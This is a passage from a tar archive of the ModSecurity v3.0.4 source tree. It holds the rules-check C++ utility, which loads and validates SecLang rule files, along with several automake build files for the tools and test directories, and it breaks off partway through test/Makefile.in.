versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/tools/rules-check/rules-check.cc0000644000175000017500000000516113607066010022570 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include #include #include #include #include #include #include "modsecurity/modsecurity.h" #include "modsecurity/rules.h" void print_help(const char *name) { std::cout << "Use: " << name << " [|SecLangCommand]" << std::endl; std::cout << std::endl; } int main(int argc, char **argv) { modsecurity::Rules *rules; char **args = argv; rules = new modsecurity::Rules(); int ret = 0; args++; if (*args == NULL) { print_help(argv[0]); return 0; } while (*args != NULL) { struct stat buffer; std::string argFull(""); const char *arg = *args; std::string err; int r; if (argFull.empty() == false) { if (arg[strlen(arg)-1] == '\"') { argFull.append(arg, strlen(arg)-1); goto next; } else { argFull.append(arg); goto next; } } if (arg[0] == '\"' && argFull.empty() == true) { if (arg[strlen(arg)-1] == '\"') { argFull.append(arg+1, strlen(arg) - 2); } else { argFull.append(arg+1); goto next; } } if (argFull.empty() == false) { arg = argFull.c_str(); argFull.clear(); } std::cout << " : " << arg << " -- "; if (stat(arg, &buffer) == 0) { r = rules->loadFromUri(arg); } else { r = rules->load(arg); } if (r < 0) { err.assign(rules->m_parserError.str()); rules->m_parserError.str(""); rules->m_parserError.clear(); ret = -1; } std::cout << "Loaded " << std::to_string(r) << " rules." << std::endl; if (err.empty() == false) { std::cerr << " " << err << std::endl; } next: args++; } delete rules; if (ret < 0) { std::cout << "Test failed." << std::endl; } else { std::cout << "Test ok." << std::endl; } return ret; } modsecurity-v3.0.4/tools/rules-check/Makefile.am0000644000175000017500000000133213607066010022104 0ustar zimmerlezimmerle bin_PROGRAMS = modsec-rules-check modsec_rules_check_SOURCES = \ rules-check.cc modsec_rules_check_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.la \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) modsec_rules_check_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(LDFLAGS) \ $(LMDB_LDFLAGS) \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) modsec_rules_check_CPPFLAGS = \ -std=c++11 \ -I$(top_builddir)/headers \ $(GLOBAL_CPPFLAGS) \ $(PCRE_CFLAGS) \ $(LMDB_CFLAGS) \ $(MAXMIND_CFLAGS) \ $(LIBXML2_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in modsecurity-v3.0.4/tools/Makefile.am0000644000175000017500000000022313607066010017675 0ustar zimmerlezimmerle ACLOCAL_AMFLAGS = -I build SUBDIRS = \ rules-check # make clean CLEANFILES = # make maintainer-clean MAINTAINERCLEANFILES = \ Makefile.in modsecurity-v3.0.4/test/0000755000175000017500000000000013607066346015477 5ustar zimmerlezimmerlemodsecurity-v3.0.4/test/Makefile.in0000644000175000017500000014255513607066346017560 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ bin_PROGRAMS = noinst_PROGRAMS = unit_tests$(EXEEXT) regression_tests$(EXEEXT) \ rules_optimization$(EXEEXT) subdir = test ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(noinst_HEADERS) \ $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = am__installdirs = "$(DESTDIR)$(bindir)" PROGRAMS = $(bin_PROGRAMS) $(noinst_PROGRAMS) am__dirstamp = $(am__leading_dot)dirstamp am_regression_tests_OBJECTS = regression/tests-regression.$(OBJEXT) \ regression/tests-regression_test.$(OBJEXT) \ regression/tests-custom_debug_log.$(OBJEXT) regression_tests_OBJECTS = $(am_regression_tests_OBJECTS) am__DEPENDENCIES_1 = regression_tests_DEPENDENCIES = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) AM_V_lt = $(am__v_lt_@AM_V@) am__v_lt_ = $(am__v_lt_@AM_DEFAULT_V@) am__v_lt_0 = --silent am__v_lt_1 = regression_tests_LINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX \ $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=link $(CXXLD) \ $(AM_CXXFLAGS) $(CXXFLAGS) $(regression_tests_LDFLAGS) \ $(LDFLAGS) -o $@ am_rules_optimization_OBJECTS = \ optimization/rules_optimization-optimization.$(OBJEXT) rules_optimization_OBJECTS = $(am_rules_optimization_OBJECTS) rules_optimization_DEPENDENCIES = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) rules_optimization_LINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX \ $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=link $(CXXLD) \ $(AM_CXXFLAGS) $(CXXFLAGS) $(rules_optimization_LDFLAGS) \ $(LDFLAGS) -o $@ am_unit_tests_OBJECTS = unit/tests-unit.$(OBJEXT) \ unit/tests-unit_test.$(OBJEXT) unit_tests_OBJECTS = $(am_unit_tests_OBJECTS) unit_tests_DEPENDENCIES = $(top_builddir)/src/.libs/libmodsecurity.a \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) unit_tests_LINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CXXLD) $(AM_CXXFLAGS) \ $(CXXFLAGS) $(unit_tests_LDFLAGS) $(LDFLAGS) -o $@ AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = DEFAULT_INCLUDES = -I.@am__isrc@ -I$(top_builddir)/src depcomp = $(SHELL) $(top_srcdir)/depcomp am__maybe_remake_depfiles = depfiles am__depfiles_remade = \ optimization/$(DEPDIR)/rules_optimization-optimization.Po \ regression/$(DEPDIR)/tests-custom_debug_log.Po \ regression/$(DEPDIR)/tests-regression.Po \ regression/$(DEPDIR)/tests-regression_test.Po \ unit/$(DEPDIR)/tests-unit.Po unit/$(DEPDIR)/tests-unit_test.Po am__mv = mv -f CXXCOMPILE = $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) \ $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) LTCXXCOMPILE = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=compile $(CXX) $(DEFS) \ $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) \ $(AM_CXXFLAGS) $(CXXFLAGS) AM_V_CXX = $(am__v_CXX_@AM_V@) am__v_CXX_ = $(am__v_CXX_@AM_DEFAULT_V@) am__v_CXX_0 = @echo " CXX " $@; am__v_CXX_1 = CXXLD = $(CXX) CXXLINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CXXLD) $(AM_CXXFLAGS) \ $(CXXFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@ AM_V_CXXLD = $(am__v_CXXLD_@AM_V@) am__v_CXXLD_ = $(am__v_CXXLD_@AM_DEFAULT_V@) am__v_CXXLD_0 = @echo " CXXLD " $@; am__v_CXXLD_1 = SOURCES = $(regression_tests_SOURCES) $(rules_optimization_SOURCES) \ $(unit_tests_SOURCES) DIST_SOURCES = $(regression_tests_SOURCES) \ $(rules_optimization_SOURCES) $(unit_tests_SOURCES) RECURSIVE_TARGETS = all-recursive check-recursive cscopelist-recursive \ ctags-recursive dvi-recursive html-recursive info-recursive \ install-data-recursive install-dvi-recursive \ install-exec-recursive install-html-recursive \ install-info-recursive install-pdf-recursive \ install-ps-recursive install-recursive installcheck-recursive \ installdirs-recursive pdf-recursive ps-recursive \ tags-recursive uninstall-recursive am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac HEADERS = $(noinst_HEADERS) RECURSIVE_CLEAN_TARGETS = mostlyclean-recursive clean-recursive \ distclean-recursive maintainer-clean-recursive am__recursive_targets = \ $(RECURSIVE_TARGETS) \ $(RECURSIVE_CLEAN_TARGETS) \ $(am__extra_recursive_targets) AM_RECURSIVE_TARGETS = $(am__recursive_targets:-recursive=) TAGS CTAGS \ distdir distdir-am am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags DIST_SUBDIRS = $(SUBDIRS) am__DIST_COMMON = $(srcdir)/Makefile.in $(top_srcdir)/depcomp DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) am__relativize = \ dir0=`pwd`; \ sed_first='s,^\([^/]*\)/.*$$,\1,'; \ sed_rest='s,^[^/]*/*,,'; \ sed_last='s,^.*/\([^/]*\)$$,\1,'; \ sed_butlast='s,/*[^/]*$$,,'; \ while test -n "$$dir1"; do \ first=`echo "$$dir1" | sed -e "$$sed_first"`; \ if test "$$first" != "."; then \ if test "$$first" = ".."; then \ dir2=`echo "$$dir0" | sed -e "$$sed_last"`/"$$dir2"; \ dir0=`echo "$$dir0" | sed -e "$$sed_butlast"`; \ else \ first2=`echo "$$dir2" | sed -e "$$sed_first"`; \ if test "$$first2" = "$$first"; then \ dir2=`echo "$$dir2" | sed -e "$$sed_rest"`; \ else \ dir2="../$$dir2"; \ fi; \ dir0="$$dir0"/"$$first"; \ fi; \ fi; \ dir1=`echo "$$dir1" | sed -e "$$sed_rest"`; \ done; \ reldir="$$dir2" ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ SUBDIRS = \ benchmark \ $(MAYBE_AFL_FUZZER) # make clean CLEANFILES = # make maintainer-clean MAINTAINERCLEANFILES = \ Makefile.in EXTRA_DIST = \ test-cases/* \ custom-test-driver \ test-suite.sh unit_tests_SOURCES = \ unit/unit.cc \ unit/unit_test.cc noinst_HEADERS = \ common/modsecurity_test.cc \ common/*.h \ unit/*.h \ regression/*.h unit_tests_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) unit_tests_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(LMDB_LDFLAGS) \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) unit_tests_CPPFLAGS = \ -std=c++11 \ -Icommon \ -I../ \ -g \ -I$(top_builddir)/headers \ $(CURL_CFLAGS) \ $(MODSEC_NO_LOGS) \ $(GEOIP_CFLAGS) \ $(MAXMIND_CFLAGS) \ $(GLOBAL_CPPFLAGS) \ $(LMDB_CFLAGS) \ $(PCRE_CFLAGS) \ $(YAJL_CFLAGS) \ $(LUA_CFLAGS) \ $(SSDEEP_CFLAGS) \ $(LIBXML2_CFLAGS) regression_tests_SOURCES = \ regression/regression.cc \ regression/regression_test.cc \ regression/custom_debug_log.cc regression_tests_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) regression_tests_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(YAJL_LDFLAGS) \ $(LMDB_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(LUA_LDFLAGS) regression_tests_CPPFLAGS = \ -std=c++11 \ -Icommon \ -I../ \ -g \ -I$(top_builddir)/headers \ $(CURL_CFLAGS) \ $(MODSEC_NO_LOGS) \ $(GEOIP_CFLAGS) \ $(MAXMIND_CFLAGS) \ $(GLOBAL_CPPFLAGS) \ $(LMDB_CFLAGS) \ $(LUA_CFLAGS) \ $(SSDEEP_CFLAGS) \ $(PCRE_CFLAGS) \ $(YAJL_CFLAGS) \ $(LIBXML2_CFLAGS) rules_optimization_SOURCES = \ optimization/optimization.cc rules_optimization_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) rules_optimization_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(LMDB_LDFLAGS) \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) rules_optimization_CPPFLAGS = \ -std=c++11 \ -Icommon \ -I../ \ -g \ -I$(top_builddir)/headers \ $(CURL_CFLAGS) \ $(MODSEC_NO_LOGS) \ $(GEOIP_CFLAGS) \ $(MAXMIND_CFLAGS) \ $(GLOBAL_CPPFLAGS) \ $(LMDB_CFLAGS) \ $(LUA_CFLAGS) \ $(SSDEEP_CFLAGS) \ $(PCRE_CFLAGS) \ $(YAJL_CFLAGS) \ $(LIBXML2_CFLAGS) all: all-recursive .SUFFIXES: .SUFFIXES: .cc .lo .o .obj $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign test/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign test/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd 